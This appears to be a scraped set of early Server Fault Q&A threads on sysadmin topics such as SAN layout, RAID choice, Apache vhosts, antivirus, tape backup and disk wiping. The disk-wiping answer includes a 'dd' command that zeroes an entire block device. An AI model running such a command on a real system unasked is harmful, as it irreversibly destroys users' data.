{ "source": [ "https://serverfault.com/questions/720", "https://serverfault.com", "https://serverfault.com/users/598/" ] }
723
There are several cloud service providers. But, if you're going to design an app that runs on their infrastructure, you have to have confidence that they are going to be around for a while, and that they are going to continue to offer the service. For example, Google might decide that AppEngine isn't profitable and close it in a year (like many of their non-profitable "20%" projects). Cash strapped startups might not make it through the current economic downturn and be forced to close down. So, who do you trust in the cloud?
It doesn't matter what is going to be around in 2015. Nobody can predict the future, but you shouldn't buy into proprietary platforms that are offered by a single vendor. Amazon EC2 is a good candidate to deploy your application on because Amazon-compatible services can easily be provided by other companies as well. Even if you want to host your application on your own servers at some point, it won't be a big problem. Amazon EC2 is practically zero lock-in. Google App Engine is just a bad candidate because there is not going to be a compatible product from another company for a very long time, if ever. It's just too proprietary and Google doesn't plan to release their technology. To me it's 100% lock-in, and if you decide to move somewhere else, it will be impossible without a massive rewrite. I would be very surprised if any ambitious and big project would bet on GAE. Windows Azure is not looking as bad as Google App Engine. Although it's still going to be hosted exclusively by Microsoft, it might be possible for other companies to come up with an (almost) compatible cloud service. After all, the core pieces of Windows Azure are based on the well-known SQL Server, IIS and .NET framework stack.
{ "source": [ "https://serverfault.com/questions/723", "https://serverfault.com", "https://serverfault.com/users/526/" ] }
767
It's standard practice to separate log and data files onto separate disks away from the OS (tempdb, backups and the swap file as well). Does this logic still make sense when your drives are all SAN-based and your LUNs are not carved off specific disks or RAID sets - they are just part of the x number of drives on the SAN, and the LUN is just a space allocation?
Logs and data drives have different data access patterns that are in conflict with each other (at least in theory) when they share a drive.

Log Writes

Log access consists of a very large number of small sequential writes. Somewhat simplistically, DB logs are ring buffers containing a list of instructions to write data items out to particular locations on the disk. The access pattern consists of a large number of small sequential writes that must be guaranteed to complete - so they are written out to disk. Ideally, logs should be on a quiet (i.e. not shared with anything else) RAID-1 or RAID-10 volume. Logically, you can view the process as the main DBMS writing out log entries and one or more log reader threads that consume the logs and write the changes out to the data disks (in practice, the process is optimised so that the data writes are written out immediately where possible). If there is other traffic on the log disks, the heads are moved around by these other accesses and the sequential log writes become random log writes. These are much slower, so busy log disks can create a hotspot which acts as a bottleneck on the whole system.

Data Writes (updated)

Log writes must be committed to the disk (referred to as stable media) for a transaction to be valid and eligible to commit. One can logically view this as log entries being written and then used as instructions to write data pages out to the disk by an asynchronous process. In practice the disk page writes are actually prepared and buffered at the time the log entry is made, but they do not need to be written immediately for the transaction to be committed. The disk buffers are written out to stable media (disk) by the Lazy Writer process (thanks to Paul Randal for pointing this out), which this Technet article discusses in a bit more detail. This is a heavily random access pattern, so sharing the same physical disks with logs can create an artificial bottleneck on system performance. The log entries must be written for the transaction to commit, so having random seeks slowing down this process (random I/O is much slower than sequential log I/O) will turn the log from a sequential into a random access device. This creates a serious performance bottleneck on a busy system and should be avoided. The same applies when sharing temporary areas with log volumes.

The role of caching

SAN controllers tend to have large RAM caches, which can absorb the random access traffic to a certain extent. However, for transactional integrity it is desirable to have disk writes from a DBMS guaranteed to complete. When a controller is set to use write-back caching, the dirty blocks are cached and the I/O call is reported as complete to the host. This can smooth out a lot of contention problems as the cache can absorb a lot of I/O that would otherwise go out to the physical disk. It can also optimise the parity reads and writes for RAID-5, which lessens the effect on performance that RAID-5 volumes have. These are the characteristics that drive the 'Let the SAN deal with it' school of thought, although this view has some limitations:

Write-back caching still has failure modes that can lose data, and the controller has fibbed to the DBMS, saying blocks have been written out to disk where in fact they haven't. For this reason, you may not want to use write-back caching for a transactional application, particularly something holding mission-critical or financial data where data integrity problems could have serious consequences for the business.

SQL Server (in particular) uses I/O in a mode where a flag (called FUA, or Force Unit Access) forces physical writes to the disk before the call returns. Microsoft has a certification program and many SAN vendors produce hardware that honours these semantics (requirements summarised here). In this case no amount of cache will optimise disk writes, which means that log traffic will thrash if it is sitting on a busy shared volume.

If the application generates a lot of disk traffic, its working set may overrun the cache, which will also cause the write contention issues.

If the SAN is shared with other applications (particularly on the same disk volume), traffic from other applications can generate log bottlenecks.

Some applications (e.g. data warehouses) generate large transient load spikes that make them quite anti-social on SANs.

Even on a large SAN, separate log volumes are still recommended practice. You may get away with not worrying about layout on a lightly used application. On really large applications, you may even get a benefit from multiple SAN controllers. Oracle publish a series of data warehouse layout case studies where some of the larger configurations involve multiple controllers.

Put responsibility for performance where it belongs

On something with large volumes or where performance could be an issue, make the SAN team accountable for the performance of the application. If they are going to ignore your recommendations for configuration, then make sure that management are aware of this and that responsibility for system performance lies in the appropriate place. In particular, establish acceptable guidelines for key DB performance statistics like I/O waits or page latch waits, or acceptable application I/O SLA's. Note that having responsibility for performance split across multiple teams creates an incentive to finger-point and pass the buck to the other team. This is a known management anti-pattern and a formula for issues that drag out for months or years without ever being resolved. Ideally, there should be a single architect with authority to specify application, database and SAN configuration changes. Also, benchmark the system under load. If you can arrange it, secondhand servers and direct-attach arrays can be purchased quite cheaply on eBay. If you set up a box like this with one or two disk arrays you can frig with the physical disk configuration and measure the effect on performance. As an example, I have done a comparison between an application running on a large SAN (an IBM Shark) and a two-socket box with a direct attach U320 array. In this case, £3,000 worth of hardware purchased off eBay outperformed a £1M high-end SAN by a factor of two - on a host with roughly equivalent CPU and memory configuration. From this particular incident, it might be argued that having something like this lying around is a very good way to keep SAN administrators honest.
{ "source": [ "https://serverfault.com/questions/767", "https://serverfault.com", "https://serverfault.com/users/626/" ] }
868
How can I have multiple IP addresses assigned to a single NIC? I remember doing this on Unix way back when. Can it be done on Windows?
Yes, it can be done in Windows:
Go to the Control Panel > Network Connections
Right click on the Local Area Connection (or whichever network connection you want to add the 2nd IP address to) and click Properties
Click on Internet Protocol (TCP/IP) in the connection box and click Properties
Enter the first IP address in the properties box
Click Advanced
Click Add under the IP Addresses box and enter the information for the 2nd IP address
Close all the boxes
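If you have to do this on more than a couple of machines, the same change can be scripted with netsh rather than clicked through the GUI. This is only a sketch - "Local Area Connection" and the address/mask are placeholders for your own values:

netsh interface ip add address "Local Area Connection" 192.168.1.21 255.255.255.0
(on Vista/2008 and later the context is ipv4: netsh interface ipv4 add address "Local Area Connection" 192.168.1.21 255.255.255.0)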
{ "source": [ "https://serverfault.com/questions/868", "https://serverfault.com", "https://serverfault.com/users/715/" ] }
906
What are the tools/utilities that you should absolutely know about while working as a Linux or Windows sysadmin? I'm thinking, for example, about GNU screen, which you'll need if you're working on Linux servers.
vi - I know not everyone likes it, but it's pretty much going to be on any *nix server you come across, and when everything else is broken you are going to need to edit config files. I would also suggest csh and sh for the same reasons.
{ "source": [ "https://serverfault.com/questions/906", "https://serverfault.com", "https://serverfault.com/users/117/" ] }
918
I've heard that the write performance of RAID 5 can be appalling at times. While I want the redundancy that it provides I don't want to sacrifice my database insert/update times. Is this something I should be worried about and if so, what would be the recommendation to get redundancy with good write performance?
RAID 10 is usually recommended since the I/O is so random. Here's an example. The calculations are a bit simplified, but pretty representative. Let's say you have a 6 drive array and your drives can do 100 I/Os per second (IOPS). If you have 100% reads, all six drives will be used and you'll have about 600 IOPS for both RAID 10 and RAID 5. The worst case scenario is 100% writes. In that scenario, RAID 10's performance will be cut in half (since each write goes to two drives), so it will get 300 IOPS. RAID-5 will convert each write into two reads followed by two writes, so it will get 1/4 the performance or about 150 IOPS. That's a pretty big hit. Your actual read/write pattern will be somewhere in-between these two extremes, but this is why RAID 10 is usually recommended for databases. However, if you don't have a busy database server, then you could even do RAID-6. I often do that if I know the database isn't going to be bottleneck since it gives you much more safety than RAID 10 or RAID 5.
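If you want to see how much the RAID-5 write penalty matters for your particular read/write mix, the arithmetic above is easy to generalise. A back-of-the-envelope sketch in Python, using the same simplified model (6 drives at 100 IOPS each; the 70/30 read/write split is just an assumed example):

drives = 6
iops_per_drive = 100
read_fraction = 0.7              # assumed workload: 70% reads, 30% writes
raw_iops = drives * iops_per_drive

def effective_iops(read_fraction, write_penalty):
    # each logical write costs 'write_penalty' physical I/Os on the array
    write_fraction = 1.0 - read_fraction
    return raw_iops / (read_fraction + write_fraction * write_penalty)

print("RAID 10:", round(effective_iops(read_fraction, 2)))   # mirrored write = 2 physical writes
print("RAID 5: ", round(effective_iops(read_fraction, 4)))   # read-modify-write = 4 physical I/Os

With those assumed numbers RAID 10 works out to roughly 460 IOPS and RAID 5 to roughly 315, which matches the intuition in the answer: the heavier your write mix, the bigger the gap.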
{ "source": [ "https://serverfault.com/questions/918", "https://serverfault.com", "https://serverfault.com/users/750/" ] }
919
What is the wiring order for a 10/100/n-Base-T patch cable? What about a crossover (x-over) cable?
The original answer showed a pinout diagram, which hasn't survived here; doing a Google image search for "cat5 pinouts" turns up plenty of them. For reference, the common TIA/EIA-568-B order (pins 1 through 8) is: white/orange, orange, white/green, blue, white/blue, green, white/brown, brown. A straight-through patch cable uses the same order on both ends; a crossover cable uses 568-B on one end and 568-A (white/green, green, white/orange, blue, white/blue, orange, white/brown, brown) on the other.
{ "source": [ "https://serverfault.com/questions/919", "https://serverfault.com", "https://serverfault.com/users/715/" ] }
923
To save some money I'm sure we would all prefer to build our own workstations. But this takes a lot more work than simply buying one off the shelf. With any luck, you'll end up with a better machine for a lower price. What methodologies do you use to decide on which parts to buy? Do you look at benchmarks? Do you find things that have compatible bus speeds? How do you know where to look to make sure everything will be compatible? Do you buy a bare bones machine and extend it?
{ "source": [ "https://serverfault.com/questions/923", "https://serverfault.com", "https://serverfault.com/users/745/" ] }
926
I have multiple network interfaces on a Windows client machine. I would like for some IP traffic to go through one card and other traffic to go through the other card based upon the IP (actually, I would prefer domain names) of the destination server. I see no way to configure this using the Windows GUI. Can I do this in WinXP+? If it's complicated, then some pointers to good articles would be sufficient as my Googling skillz seems to fail here.
{ "source": [ "https://serverfault.com/questions/926", "https://serverfault.com", "https://serverfault.com/users/712/" ] }
959
How do you recommend destroying sensitive information on a hard drive? I've used DBAN in the past, is that good enough?
DBAN is just fine. Here's the dirty little secret--any program that overwrites every byte of the drive will have wiped everything permanently. You don't need to do multiple passes with different write patterns, etc. Don't believe me? See the standing challenge to prove that a drive overwritten with 0s once can be recovered. Nobody seems willing to take up the challenge. http://16systems.com/zero.php
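If you only have one drive to deal with and don't want to boot DBAN, a single overwrite pass from a Linux live CD does the same job the challenge is about. A hedged sketch - /dev/sdX is a placeholder, and getting the device name wrong will wipe the wrong disk:

# one pass of zeros over the whole device; there is no undo
dd if=/dev/zero of=/dev/sdX bs=1M
# recent GNU dd versions can also report progress while running
dd if=/dev/zero of=/dev/sdX bs=1M status=progress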
{ "source": [ "https://serverfault.com/questions/959", "https://serverfault.com", "https://serverfault.com/users/32/" ] }
1,014
What are people using for website monitoring services? I am referring to a service that I can configure specific hits to my site to monitor if the site is up, and how fast it is responding to the requests. I am looking for an external service, that will hit my server from several locations, and will provide me notification if the site does not respond within certain tolerances. It can be free or paid.
Here's a breakdown of the major players in the external performance monitoring space:

Top Shelf
Webmetrics.com - largest network, great monitoring technology, fun UI
Keynote.com - focused on mobile, long time player in the space
Gomez.com - lots of different products, product life cycle focus

Middle
AlertSite.com - does a lot of things, nothing extremely well
Pingdom.com - popular in the web 2.0 world
site24x7.com - owned by zoho, cheap
webmon.com - supports escalations, custom triggers and realtime dashboards

Low End
monitis.com
siteuptime.com
dotcom-monitor.com

What you need to look for in deciding between the various options:
If you want to monitor a transaction, versus just a URL, you should try out the scripting technology to understand how easy/complicated it is to set up your monitoring.
The monitoring network - how many locations around the world you want to get performance metrics from.
The alerting options - how configurable the thresholds/escalations are.
The reporting - how useful the various reports/graphs are, and how much you can drill down into the nitty gritty.
{ "source": [ "https://serverfault.com/questions/1014", "https://serverfault.com", "https://serverfault.com/users/721/" ] }
1,046
For software developers, there are some books you must absolutely read. What is the single most influential book every programmer should read? How about for sysadmins? Is there a similar list of books?
The only essential I have is The Practice of System and Network Administration by Limoncelli, Hogan, et al. My first edition copy lives on my desk
{ "source": [ "https://serverfault.com/questions/1046", "https://serverfault.com", "https://serverfault.com/users/775/" ] }
1,217
What antivirus would you recommend for computers used for windows development. Would you use an antivirus for these users? These users compile quite often and therefore read and write tons of files. If I deploy a slow performing antivirus, they will not be happy.
You NEED antivirus software It's been said a few times in these answers that developers should know better, or should only install software they need from known good sites, etc, so if you need antivirus you have a social issue, not a technical issues. A few points on that: Prevention is only one of the functions of antivirus. Even if your vendor is slow about getting new definitions out, if your software detects a virus on your machine after the fact you're much better off than if you had no AV software at all. Everyone, no matter how brilliant, makes mistakes. You cannot bet your infrastructure on the perfection of your employees' awareness. Downloading software is only one vector of viral attack. What about software vulnerabilities? What if a "known-good" software site is hijacked? What if automatic update software (Java, Adobe, Apple, MS, whatever) is compromised? Your security is too valuable to leave in the hands of your employees and your vendors. Unless you're a very small company, you have non-technical people working with you. Receptionists, office managers, sales people, etc. If your devs are perfect and your receptionist clicks a bad link his mom sent to him, your network is compromised. Installing AV software on all machines except your developers' leaves the (arguably) most valuable workstations unprotected. Your developers have software on their machines that is not "necessary" for their jobs. Guaranteed. iTunes, AIM, other apps they've discovered that they like. They're smart enough to get around policies/software that tries to prevent this. My recommendations At Fog Creek, we use ESET NOD32. I have tested Symantec, Kaspersky, Norton, ZoneAlarm, Avast, and AVG. All of them have noticeable performance issues, and many were downright unusable for our devs (blocked debuggers, caused issues when hooking into system calls, etc). NOD32 has been deployed for nearly a year now, and I've only had a single dev run into any trouble with it (and that was fixed by checking a configuration option). It causes no noticeable performance hit, doesn't interfere with any of our tools, and is unbelievably simple to setup - I deployed it across all of our workstations and servers in the middle of the day from the comfort of my desk. The only trouble we had with NOD32 was a big performance hit when running VMWare Workstation during our evaluation period. After exempting all VMWare files from realtime scanning, the problem disappeared.
{ "source": [ "https://serverfault.com/questions/1217", "https://serverfault.com", "https://serverfault.com/users/888/" ] }
1,405
When my Ubuntu Apache server (Apache 2) starts up I get a warning message that reads: [warn] NameVirtualHost *:80 has no VirtualHosts However, the web server is working fine. What might I have wrong in my site's configuration to make it give me this warning? The configuration file in question (located in /etc/apache2/sites-available ) reads like (details removed for brevity) <VirtualHost *> <Location /mysite> # Configuration details here... </Location> # Use the following for authorization. <LocationMatch "/mysite/login"> AuthType Basic AuthName "My Site" AuthUserFile /etc/sitepasswords/passwd Require valid-user </LocationMatch> </VirtualHost> Could the fact that I'm using <Location> be a part of the problem?
Change <VirtualHost *> to read <VirtualHost *:80>. Alternatively, NameVirtualHost *:80 may have been added twice in your Apache2 configuration (by default it's added in the ports.conf file). This should clear the error. Aside: you shouldn't ignore this error. Apache's config, especially when globbing virtual hosts (e.g. Include /etc/httpd/vhosts.d/*), is not stable. That means you don't control the order of loading the hosts explicitly, so the default vhost for an IP becomes the one that is loaded first, which can lead to unintended consequences. One example of this is that the default vhost will also be reachable by the bare IP address, rather than just by its name. This can cause information to leak onto Google referring to your site's IP rather than its name, which can be confusing for customers. The NameVirtualHost error above can be a hint that Apache has loaded things in a non-optimal way, so you shouldn't ignore it.
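For reference, the directive and the vhost have to agree on the address and port; a minimal example of the matching pair looks something like this (the server name is a placeholder):

NameVirtualHost *:80

<VirtualHost *:80>
    ServerName www.example.com
    # ... rest of the site configuration ...
</VirtualHost>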
{ "source": [ "https://serverfault.com/questions/1405", "https://serverfault.com", "https://serverfault.com/users/916/" ] }
1,473
We've all seen good and bad examples of cable management. What are objective, measurable requirements that can be used in a policy to maintain cabling order in the rack/server room/data center? I'm not looking for "Don't do spaghetti wiring!" but practical, objectively measurable policy that can be readily explained, followed, and inspected for whether it passes or fails the requirements in the policy. Please avoid, "Don't do x, y, or z" - instead re-form the requirement as a "Do A, B, and C" where following the second requirement will eliminate the problems explained in the first requirement.
Use cables as close to the correct length as possible. Spare cable should be coiled away from the concentrator - so spare power cable gets coiled next to the machine, not the powerstrip, and spare network cable next to the machine, not the hub. Don't be stingy with cable ties, be they zip ties or velcro pulls. When in doubt, use an extra, and don't hesitate to trash old ones. Machines should still be removable once unplugged, which means run your cables vertically down the edges of the rack, not the middle. Only run cross-rack in one place (probably the top or bottom of the rack), and run as little cross-rack as possible. Color coding is good, but when troubleshooting, what is trumps what's supposed to be. Fix it all now . 'Later' never comes. Corollary: everything should always be perfect before you leave - or you have concrete plans to come back and fix it. Label cable ends with abstractions: numbers, letters, whatever. Don't bother with 'firewall', 'external', etc - they'll get moved and re-used and the labels will be wrong; better to keep the labels an extension of the 'color' so they can be easily reused without having to be relabeled. A lot of this is from old telco practice - you think we manage a lot of cables, you should look inside a real telco crossconnect sometime - well, but don't because they're often spaghetti.
{ "source": [ "https://serverfault.com/questions/1473", "https://serverfault.com", "https://serverfault.com/users/706/" ] }
1,649
My Windows Server 2003 Std server refuses to server ASP.NET content. It serves regular html just fine but anything .net, even a one line html file with an ASPX extention fails silently. Things I've tried: Nothing in the event log or IIS WWW logs when it fails. Fiddler shows no response I reinstalled .NET with C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727>aspnet_regiis.exe -U C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727>aspnet_regiis.exe -I I give obscenely high permissions on everything I can think of (full control, read, write, etc.) to all possibly relevant users (IUSER*, ASP.NET, etc.). I confirmed that ASP.Net v1 and v2 Web Service Extensions are "allowed" in IIS Confirmed that the Server Manager had IIS and ASP.Net roles enabled Again: this is the scenario: http://localhost/Test/Default.htm <-- Works great! http://localhost/Test/Default.aspx <-- Bombs silently with no message at all Any guidance will be much appreciated! Solution: I reinstalled per the instructions below and it works now. Thanks all!
I've run into this exact issue several times, and every time, the solution was to:
go to the Control Panel
go to the "Windows Components" area
remove IIS, let it uninstall
reboot
re-add IIS ( make sure to include the ASP.NET stuff when you check off the boxes )
Run this:
C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727>aspnet_regiis.exe -I
I spent hours debugging this at a client site once, and that was the trick. Since then, every time this has happened, this was the fix. I'm not sure what the root cause is, but we tore the IIS configuration apart once trying to figure it out, and even had Microsoft RDC'ing into the server in question for 2 or 3 hours, and they couldn't help either. So I write it off as an undocumented bug in ASP.NET/IIS.
{ "source": [ "https://serverfault.com/questions/1649", "https://serverfault.com", "https://serverfault.com/users/375/" ] }
1,668
This might seem like a silly (or nefarious) question at first glance, but allow me to elaborate... We have implemented all sorts of measures on the company network and proxy to prevent the download of certain file types on to company machines. Most files, even zip files with exe's inside get blocked when clicking to download those files. But some "enterprising" users still manage to get downloads to work. For example, I was standing behind someone (who didn't know me or which department I worked in), who in front of our eyes changed a URL that ended with ".exe" to ".exe?", and the browser went right ahead and downloaded the "unknown" file type. We've since then plugged this hole, but I'd like to know if anyone else knows of any nefarious means of downloading files bypassing network security and checking software. Or perhaps if you know of some commercial software that you can swear is bulletproof, and we can trial it for a while. Any help appreciated...
Regardless of what technical solution you come up with, someone will find a way around it. If you're serious about this (and not just doing it to discourage casual downloads or fulfill some faceless policy mandate), then please, please , Talk to your users! Explain why you're blocking what you're blocking. Help them to understand the importance of it. And then listen to them when they tell you why they still need to download executable files, and help them find a way to do their jobs without making your job harder. For years, one of our suppliers had a system similar to yours in place. Unfortunately, they were also responsible for providing us with regular updates to their pricing software, and during testing it was common for executables to frequently travel back and forth between our networks. Due to the filters, we all just got in the habit of renaming files (.exe -> .ear, etc.), compressing them, compressing then renaming them, even using personal machines to transfer them... not only subverting the restrictions and amplifying the potential danger to both companies, but also destroying much of our respect for those behind the restrictions. Finally, someone got the message and set up a secured FTP server for us to use. It's all too common to focus on the technical side of things, and forget about the resourceful humans who must deal with the consequences of them. Naturally, if you're already doing this, then more power to you!
{ "source": [ "https://serverfault.com/questions/1668", "https://serverfault.com", "https://serverfault.com/users/246/" ] }
1,669
I know there was a command on Unix that I could use to monitor a file and see changes that are getting written to it. This was quite useful especially for checking log files. Do you know what it is called?
Do you mean tail -f logfile.log ? ( Man page for tail )
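A couple of variations that are handy for the log-watching case, assuming GNU tail and less are available (the file names are just examples):

tail -f /var/log/syslog /var/log/auth.log     # follow several files at once; tail prints a ==> header before each file's output
less +F logfile.log                           # like tail -f, but Ctrl-C lets you scroll back through the file, then F resumes following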
{ "source": [ "https://serverfault.com/questions/1669", "https://serverfault.com", "https://serverfault.com/users/1127/" ] }
1,701
We've backed up our data on LTO tapes for years and it's a real comfort to know we have everything on tape. A sister project and one of our data providers have both moved to 100% disk storage because the cost of disk has dropped so much. When we propose systems to potential customers these days we tend to downplay or not mention our use of tape systems for data storage since it might seem outdated. I feel more comfortable with having data saved in two separate formats: disks and tape. In addition, once data is securely written to tape, I feel (perhaps naively) that it's been permanently saved. Not having to rely on a RAID controller to be able to read back data is another plus for me. Do you see a place for tape backup these days?
The main advantage of tapes is that it's easy to put them into a rotation scheme and store them off-site for long term backup. You can do the same with disks, but usually they're not that easily fitted into a rotation cycle, and you'll have to store them carefully to avoid damaging them (same goes for tape as well of course, but they're easier to handle).
{ "source": [ "https://serverfault.com/questions/1701", "https://serverfault.com", "https://serverfault.com/users/1126/" ] }
1,750
I've been out of the virtual machine market for a while. Back in 2005, I used Microsoft Virtual PC 2004 (not free) and the current version of VMWare (not free). What are some good, free solutions? I'm sick of trying out new software on my host OS and hosing it!
I've been using Sun's VirtualBox for the past little while, and I have been completely happy with it. Update: I have been wanting to update this to provide some of the reasons why I am perfectly happy with it, but in doing that I will take way from the comments that other's have added. So, with that said, I highly recommend people read the associated comments.
{ "source": [ "https://serverfault.com/questions/1750", "https://serverfault.com", "https://serverfault.com/users/1115/" ] }
1,782
Given a new office, new desks, and very little limitation on per-person costs (within reason - virtual reality helmets are not likely) what is the ideal number, size, and orientation of (presumably flat-screen LCD) monitors to maximize productivity, efficiency, and accuracy in coding? If it's relevant, assume .NET development for a web environment, employees in individual offices with large desks. The coders are currently IMing for most conversation, though all are on-site, and web browsing is a part of the job.
There's no such thing as an "ideal monitor setup" because there's no such thing as a "canonical user" either ! (plus the setup you need depends on the tasks you have to perform) That being said, the strategy I use at my company is simple : Get every developer as many monitors as he asks for. Plain and simple. (And I should mention I am running this company, so I'm basically the one paying for hardware ; that being said, I used the same strategy in my previous work position, when I was running a middle-sized .net programming team in a top-tier Investment Bank) Three reasons to use this strategy : A typical monitor costs around $300 and will probably be used for say 3 years... That's a total cost of ownership of around $.5 a day including electricity. The cost of 'ownership' of a good programmer is rather in the $500's a day. In other words, a monitor pays for himself as soon as he saves 1 minute a day of a programmer's time. You acknowledge the fact that your programmers know better than you what they need to get their work done (which is a strong motivator for them). I use to tell my team-members : If you need something to get your work done, just buy it, or ask me to get it bought. I don't want to waste your time arguing over why you need an USB rocket launcher. You probably know better than me what you need :) You acknowledge the fact that your programmers work is important enough to let them having the best tools money can buy (again, a very strong motivator) In fact, programmers are so expensive that almost everything that can ease their job is worth buying. I'm talking about : as many monitors as they need a very fast computer, SSD, quadcore, you name it. another computer, if it's needed all the books he might want to look at To end with, a few words about my current setup for developing a .net software (YMMV if you're either not me, not me in may '09, or not developing a .net software) two verticals 22" 1920*1080 monitors, displaying a vertically-split Visual Studio one landscape 22" 1920*1080 monitor for VS's toolboxes (solution explorer, toolbox, etc.) and other various tools (SQL Management Studio, namely) one landscape 22" 1920*1080 monitor for firefox/IM/outlook A good reason to add an extra-monitor is if you need some things to be constantly visible (such as supervision tools) In my experience, I hate working with only one monitor, 2 is ok, my productivity still benefits for a third one, and extra monitors are not really needed.
{ "source": [ "https://serverfault.com/questions/1782", "https://serverfault.com", "https://serverfault.com/users/1107/" ] }
1,797
Does Windows 7 have native support for mounting CD/DVD ISO images? If not, what is the best tool to use for that under Windows 7 64-bit? I am looking for a solution to allow installing MSDN downloads without burning them to CD/DVD.
My preference is Slysoft Virtual Clone Drive . It's great because: you can mount/dismount by right-clicking on the drive the drive remembers what has been mounted before you can mount an iso by right-clicking the ISO itself. No issues with device driver signing, etc. I dumped Daemon Tools a while ago. Using it on Win7 7100 64 bit with no problem. Feels quite fast.
{ "source": [ "https://serverfault.com/questions/1797", "https://serverfault.com", "https://serverfault.com/users/1190/" ] }
1,966
One thing that annoys me no end about Windows is the old sharing violation error. Often you can't identify what's holding it open. Usually it's just an editor or explorer just pointing to a relevant directory but sometimes I've had to resort to rebooting my machine. Any suggestions on how to find the culprit?
I've had success with Sysinternals Process Explorer . With this, you can search to find what process(es) have a file open, and you can use it to close the handle(s) if you want. Of course, it is safer to close the whole process. Exercise caution and judgement. To find a specific file, use the menu option Find->Find Handle or DLL... and type in part of the path to the file. The list of processes will appear below. If you prefer the command line, the Sysinternals suite includes the command line tool Handle , which lists open handles. Examples:
c:\Program Files\SysinternalsSuite>handle.exe |findstr /i "e:\"   (finds all files opened from drive e:\)
c:\Program Files\SysinternalsSuite>handle.exe |findstr /i "file-or-path-in-question"
{ "source": [ "https://serverfault.com/questions/1966", "https://serverfault.com", "https://serverfault.com/users/1232/" ] }
2,016
I often find myself opening several ssh connections in order to view several log files at a time with tail -f . This isn't a problem when I'm at home because I use public key encryption for password-less login. However, I will often use computer at my university to do this so I don't have the option of using my private key. It gets annoying to enter my password 4 or 5 times to get several terminal windows. How can I get multiple terminals over a single connection?
Just use GNU screen , it's great as you can start up remote sessions and restore them if your connection drops. It's available as a package for most distributions and may even already be installed on your university system. The manual will give you all you need to get started, by default all commands are preceeded by Ctrl+A . For example to bring up the onscreen help, just press Ctrl+A then press ?
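A minimal session for the multiple-tail case might look like this; the session name is arbitrary and the key bindings assume the default Ctrl+A prefix:

screen -S logs                 # start a named session on the server
tail -f /var/log/messages      # first log in the first window
# Ctrl+A c opens a new window for another tail; Ctrl+A n / Ctrl+A p cycle through windows
# Ctrl+A d detaches and leaves everything running
screen -ls                     # later: list sessions
screen -r logs                 # reattach to the named session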
{ "source": [ "https://serverfault.com/questions/2016", "https://serverfault.com", "https://serverfault.com/users/1279/" ] }
2,106
I have multiple web sites hosted with IIS 6.0 on Windows Server 2003. Some of them use the .Net 1.1 framework while the others use .Net 2.0. I currently have application pools set up for each framework. Are there any other reasons to add additional application pools?
Yes, many: AppPools can run as different identities, so you can restrict permissions this way. You can assign a different identity to each app pool so that when you run task manager, you know which w3wp.exe is which. You can recycle/restart one app pool without affecting the sites that are running in different app pools. If you have a website that has a memory leak or generally misbehaves, you can place it in an app pool so it doesn't affect the other web sites If you have a website that is very CPU-intensive (like resizing photos, for instance), you can place it in its own app pool and throttle its CPU utilization If you have multiple websites that each have their own SQL database, you can use active directory authentication instead of storing usernames/passwords in web.config.
{ "source": [ "https://serverfault.com/questions/2106", "https://serverfault.com", "https://serverfault.com/users/854/" ] }
2,107
I've had to load test HTTP servers/web applications a few times, and each time I've been underwhelmed by the quality of tools I've been able to find. So, when you're load testing a HTTP server, what tools do you use? And what are the things I'll most likely do wrong the next time I've got to do it?
JMeter is free. Mercury Interactive Load Runner is super nice and super expensive.
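If you go with JMeter, the usual pattern is to build the test plan in the GUI but run the actual load test in non-GUI mode so the GUI overhead doesn't skew the numbers. A sketch - the .jmx and .jtl file names are placeholders:

jmeter -n -t webtest.jmx -l results.jtl     # -n = non-GUI, -t = test plan, -l = sample log for later analysis

The results file can afterwards be opened in a GUI listener to graph response times and throughput.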
{ "source": [ "https://serverfault.com/questions/2107", "https://serverfault.com", "https://serverfault.com/users/1299/" ] }
2,219
Since I'm not a hardware expert, I don't know what features make a network switch a good network switch. What should I pay attention, when I'm comparing the different models from different vendors?
It is all about features, and the quality of the device. You can usually check the quality of the device by looking for reviews for that particular device. Features you want to look at:
Port count, and link speed for each port.
Remote administration features. How will you configure the switch: http, https, ssh, telnet, a proprietary tool?
The bandwidth of the backplane. A switch should be able to allow for lots of simultaneous conversations. For a 1GB switch, you might expect to see a 10GB backplane.
VLAN support - this allows you to have multiple virtual networks.
Etherchannel/Bonding/Link Aggregation. It is possible to merge many ports into a single trunk.
Routing/Firewalling L3 features. These days, many advanced switches include routing functionality.
Quality of Service (QoS) - if you will be using VoIP, having QoS is pretty much required.
Stackability - many switches can be stacked using a special cable which allows them to be managed as a single unit.
POE - some types of devices like phones can be powered by the switch.
If you have a small network, you probably don't really need most of the features, and a simple inexpensive switch will be fine. If you have high security demands, a VoIP system, or a complex network, you'll need more features.
{ "source": [ "https://serverfault.com/questions/2219", "https://serverfault.com", "https://serverfault.com/users/45/" ] }
2,232
I'm trying to see how much electricity is required to power 'x' number of computers. I know it's a vague thing because some computers draw more than others (eg. diff chipsets, HDD, vid cards, PSU's, etc). So, let's just assume it's a mum-and-dad Dell computer with some average run of the mill stuff. Nothing fancy. 20" LCD's. This is to help calculate the generator power required to keep around 'x' computers running in a LAN. The real figure is in the hundreds .. but I'm assuming I can just figure out the base cost for one machine and then multiply it by the number of seats. I understand this doesn't include switches, servers, cooling (fans), etc...
I did some stats on this a while ago FWIW, using the handy dandy kill-a-watt ..

Typical Developer Dell PC (2.13 GHz Core 2 Duo, 2 GB RAM, 10k RPM 74 GB main hard drive, 7200 RPM 500 GB data drive, Radeon X1550 video)
Sleep: 1 w
Idle: 80 w
One CPU core fully loaded: 108 w
Both CPU cores fully loaded: 122 w

Standard Developer Thinkpad T-60 Laptop (core 2 duo 2.0 GHz, 100GB hdd, ATI X1400 video)
Sleep: 1 w
Idle: 66 w
One CPU core fully loaded: 74 w
Both CPU cores fully loaded: 82 w

LCDs
Old Dell 19": 50 w
Ancient, giant 21" NEC: 67 w
New Dell 19": 28 w
New Samsung 19": 28 w
Apple 23" LCD: 72 w
Samsung 24" LCD: 54 w

It turns out with the LCDs the default brightness level has a lot to do with how much power they draw. I almost immediately turn any LCD I own down to 50% bright, just because my eyes are overwhelmed if I don't...
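To turn measurements like these into a generator estimate, it's just multiplication plus some headroom. A rough sketch - the seat count, per-machine wattages and margin are assumptions to replace with your own figures:

seats = 200                  # assumed LAN size
pc_watts = 122               # desktop under full load, from the figures above
monitor_watts = 28           # modern 19" LCD at moderate brightness
headroom = 1.25              # margin for switches, servers, startup surges, etc.

total_watts = seats * (pc_watts + monitor_watts) * headroom
print("Estimated generator load: %.1f kW" % (total_watts / 1000.0))

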